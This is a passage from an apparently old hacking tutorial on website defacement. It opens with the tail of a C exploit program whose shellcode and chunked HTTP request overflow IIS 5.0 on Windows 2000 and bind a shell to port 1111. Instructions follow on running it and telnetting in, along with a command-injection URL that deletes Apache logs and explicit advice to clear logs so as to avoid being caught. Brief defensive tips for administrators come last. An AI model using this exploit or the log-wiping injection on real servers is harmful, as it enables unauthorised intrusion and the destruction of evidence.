        "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
        "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
        "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
        "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
        "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
        "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
        "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
        "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
        "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
        "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
        "\xff\xff\x95\x18\xff\xff\xff";

    char* s1="POST ";
    char* s2="Accept: */*\r\n";
    char* s4="Content-Type: application/x-www-form-urlencoded\r\n";
    char* s5="Transfer-Encoding: chunked\r\n\r\n";
    char* sc="0\r\n\r\n\r\n";     /* terminating zero-length chunk */

    /* 8 KB NOP sled with the shellcode at its end; it travels in the query string */
    char shellcodebuff[1024*8];
    memset(shellcodebuff,0x90,sizeof(shellcodebuff));
    memcpy(&shellcodebuff[sizeof(shellcodebuff)-strlen(shellcode)-1],shellcode,strlen(shellcode));
    shellcodebuff[sizeof(shellcodebuff)-1] = 0;

    char sendbuff[1024*16];
    memset(sendbuff,0,1024*16);

    /* Chunked body: one 16-byte (0x10) pad chunk, then two 4-byte chunks whose
       placeholder contents AAAA and BBBB are overwritten below with the two
       addresses. The length is taken before the overwrite, because the
       addresses contain zero bytes. */
    sprintf(sendbuff,"%s%s?%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
            s1, destFile, shellcodebuff, s2, destIP, s4, s5, pad, sc);

    int sendlen=strlen(sendbuff);
    *(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr;
    *(DWORD *)strstr(sendbuff,"AAAA") = srcdata;

    result=send(s,sendbuff,sendlen,0);
    if(result == -1 )
    {
        puts("Send shellcode error!");
        return -1;
    }

    memset(buff,0,4096);
    result=recv(s,buff,sizeof(buff),0);

    /* A normal HTML reply means the overflow did not take */
    if(strstr(buff,"<html>") != NULL)
    {
        shutdown(s,0);
        closesocket(s);
        puts("Send shellcode error!Try again!");
        return -1;
    }

    shutdown(s,0);
    closesocket(s);
    printf("\nUse <telnet %s 1111> to connect to the host\n",destIP);
    puts("If you cannot connect to the host,try run this program again!");
    return 0;
}

The above is what is called an exploit: a program written for one specific vulnerability, usually in C or Perl and occasionally in Java. The vulnerability this one targets was patched by Microsoft long ago, and by now server software and operating systems are generally patched against the flaws that old exploits rely on. So you cannot simply run an exploit you found to break into a server; you must rework it to fit your target (here, at the very least, the two hard-coded addresses depend on the exact Windows build). You must also keep yourself up to date with the latest vulnerabilities by visiting the sites I mentioned earlier. Better still, learn to write your own exploits in Perl or C.

NOTE: I am talking about high-profile websites, not trivial sites coded in Notepad.

Keeping yourself safe

You must be familiar with server software such as Apache and Microsoft IIS, so you will know about the log files, which record every request the server receives. Because everything is recorded, the system administrator will have no trouble tracing a malicious cracker or script kiddie: the log holds the IP (Internet Protocol) address of every client, and through the IP address the cracker or script kiddie can be traced. NOTE: Read my tutorial on Gathering Information of Remote Host. TIP: If you do not want to get busted, you must clear the log files after breaking into a web server.

CLEARING LOGS
You must clear the logs to keep from getting busted. On Apache for Windows, the same batch-file CGI command injection used earlier to copy httpd.conf can be turned on the log directory with the following URL:

http://www.target.com/cgi-bin/test-cgi.bat?|del+/q+..\logs\*.*

NOTE: The above URL applies to Apache on Windows; Apache keeps its logs in the logs directory beside conf, and /q suppresses the "Are you sure?" prompt that del asks for *.*. Bear in mind that a running Apache holds its log files open, so on Windows the delete may be refused with a sharing violation, and a careful administrator ships the logs to another host where you cannot reach them.

In the case of IIS on Windows 2000 you can instead get a DOS shell through telnet, as follows.

The C program listed above under Overworking known vulnerabilities exploits a buffer overflow in IIS 5 on Windows 2000, opens port 1111 on the target and binds a shell to it. If the exploit succeeds, all you have to do is telnet to port 1111 of the target and the system is yours.


IMPLEMENTATION OF THE CODE

To use the C code, compile it and run it against the target. What does it actually do? It overflows IIS 5.0 on Windows 2000 through the chunked request and makes the server bind a command shell to TCP port 1111 on the target itself (a bind shell; nothing connects back to you). Once the exploit works, telnet to port 1111 of the target IP and you are connected to a shell on the system without any kind of authentication.

Various Security Measures


Website defacement has become a terrible problem for IT (Information Technology) based companies. Every day thousands of websites are defaced, government websites among them, for different reasons; the most common is cyber war. Just as rival countries fight wars in the real world, there are cyber wars in the wired world. To see an archive of web attacks, visit: http://defaced.alldas.org

Now some security measures for system administrators.

- First of all, organise your web root into suitable directories: images in an image directory, server-side content in its own directory, and so on, and grant each directory only the permissions it needs (never Write together with Scripts and Executables). If you do not configure your web root properly, your web server will be prone to many attacks.
- Disable what you do not use: WebDAV, FrontPage authoring and sample CGI scripts such as test-cgi.bat are each a way in when left enabled without need.
- Keep up with the latest vulnerabilities; visit these sites:
http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com
- Every web server is vulnerable, but there is no need to panic: download and apply the latest patch for each vulnerability as it is published.

The last thing is that you must be able to predict the moves of a malicious cracker or script kiddie. You need to know how a cracker breaks into your site or web server, you need to know the motive behind the attack, and you must think, act and work like a hacker to keep the cracker out. This completes my tutorial on defacing websites. I hope you have understood the workings of web servers.

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
